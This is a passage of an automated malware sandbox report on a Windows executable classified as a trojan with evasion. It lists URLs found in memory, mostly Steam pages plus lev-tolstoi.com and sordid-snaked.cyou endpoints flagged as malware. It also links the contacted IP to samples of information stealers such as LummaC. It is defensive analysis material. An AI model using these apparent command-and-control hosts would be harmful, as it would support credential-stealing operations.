https://community.fastly.	L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/subscriber_agreement/	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000751000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000751000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE	L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en	L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/discussions/	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/stats/	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/steam_refunds/	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/S	L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a	L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apiHft2	L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/workshop/	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000751000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apiDN	L5Kgf2Tvkc.exe, 00000000.00000003.1769496766.000000000075B000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000002.2043895282.000000000075B000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000075B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geo	L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.00000000006B9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/	L5Kgf2Tvkc.exe, 00000000.00000003.1769496766.000000000075B000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000002.2043895282.000000000075B000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000075B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000751000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com:443/profiles/76561199724331900	L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1765053093.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/points/shop/	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.3.dr	false		high
https://store.steampowered.com/	L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/inventory/	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/33	L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/privacy_agreement/	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/xe$N	L5Kgf2Tvkc.exe, 00000000.00000003.1769496766.000000000075B000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000002.2043895282.000000000075B000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000075B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://lev-tolstoi.com:443/api	L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/account/cookieprefer	L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.00000000006B9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/account/cookiepreferences/	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sordid-snaked.cyou/api	L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1765053093.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/mobile	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/	L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81	L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/pi	L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l	L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apil1	L5Kgf2Tvkc.exe, 00000000.00000003.1769496766.000000000075B000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000002.2043895282.000000000075B000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000075B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199724331900/badges	L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.157.254	lev-tolstoi.com	United States		13335	CLOUDFLARENETUS	false
23.55.153.106	steamcommunity.com	United States		20940	AKAMAI-ASN1EU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580301
Start date and time:	2024-12-24 08:59:35 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	L5Kgf2Tvkc.exe renamed because original name is a hash value
Original Sample Name:	607558ab24e139b427bdc194ae34157c.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/9@11/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 20 Number of non-executed functions: 210
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 40.69.42.241, 20.42.73.29, 40.126.53.21, 13.107.246.63
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, sls.update.microsoft.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:00:30	API Interceptor	6x Sleep call for process: L5Kgf2Tvkc.exe modified
03:01:05	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.157.254	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse
	Bire1g8ahY.exe	Get hash	malicious	LummaC, Stealc	Browse
	NfwBtCx5PR.exe	Get hash	malicious	LummaC	Browse
	pJRiqnTih0.exe	Get hash	malicious	LummaC	Browse
	xxLuwS60RS.exe	Get hash	malicious	LummaC	Browse
